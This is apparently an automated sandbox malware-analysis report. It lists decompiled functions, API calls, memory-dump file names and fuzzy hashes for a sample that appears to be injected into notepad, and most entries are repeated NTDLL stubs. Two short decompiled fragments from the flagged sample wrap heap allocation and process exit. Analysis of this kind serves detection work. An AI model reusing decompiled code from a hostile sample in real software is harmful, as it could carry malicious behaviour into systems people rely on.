                                                    Function 00B107AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B082 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 64%
                                                    			E0041B082(int _a4) {
				intOrPtr _v0;
				void* _v117;
				void* _t16;
				void* _t17;

				asm("loope 0xffffffa2");
				_t17 = _t16 - 1;
				_t9 = _v0;
				_push(_t17);
				_t5 = _t9 + 0xca0; // 0xca0
				E0041B9B0( *((intOrPtr*)(_v0 + 0xa18)), _t9, _t5,  *((intOrPtr*)(_v0 + 0xa18)), 0, 0x36);
				ExitProcess(_a4);
			}







                                                    0x0041b089
                                                    0x0041b08d
                                                    0x0041b093
                                                    0x0041b09c
                                                    0x0041b0a2
                                                    0x0041b0aa
                                                    0x0041b0b8

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(vWA,?,00415F1D,00415F1D,?,00415776,?,?,?,?,?,00000000,00409C63,?), ref: 0041B03D
                                                    • ExitProcess.KERNELBASE(0041C48F,?,?,0041C48F,00000000,00000000), ref: 0041B0B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateExitHeapProcess
                                                    • String ID: vWA
                                                    • API String ID: 1054155344-1528592229
                                                    • Opcode ID: 5aa41e28b468d9b0d63613d672c180d8e362ee632ee0d916fa3d3cc579db1699
                                                    • Instruction ID: 7c9262438622dce2d724f26de31a00fda54a6464a1015e9671b07ce6936c2503
                                                    • Opcode Fuzzy Hash: 5aa41e28b468d9b0d63613d672c180d8e362ee632ee0d916fa3d3cc579db1699
                                                    • Instruction Fuzzy Hash: 96F0EC712012047FD724EF608C81EE77B6DEF8A380F188599FA881F246C638A505CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B010 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 124 41b010-41b041 call 41b9b0 RtlAllocateHeap
                                                    C-Code - Quality: 100%
                                                    			E0041B010(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;

				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t6 =  &_a8; // 0x415776
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041b027
                                                    0x0041b032
                                                    0x0041b03d
                                                    0x0041b041

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(vWA,?,00415F1D,00415F1D,?,00415776,?,?,?,?,?,00000000,00409C63,?), ref: 0041B03D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: vWA
                                                    • API String ID: 1279760036-1528592229
                                                    • Opcode ID: e77891752dfc437e4e37da3c687c4fa59a94b2c4f2e68d5705797ab49e5e053f
                                                    • Instruction ID: 9531688935f3a2b7056db7c89bb0bf16f165683fb50d21261ac8578b5a96acb1
                                                    • Opcode Fuzzy Hash: e77891752dfc437e4e37da3c687c4fa59a94b2c4f2e68d5705797ab49e5e053f
                                                    • Instruction Fuzzy Hash: 1CE012B1200208ABDB18EF99DC45EA737ACEF88754F018159BA085B242CA30F9118AF4
                                                    Uniqueness

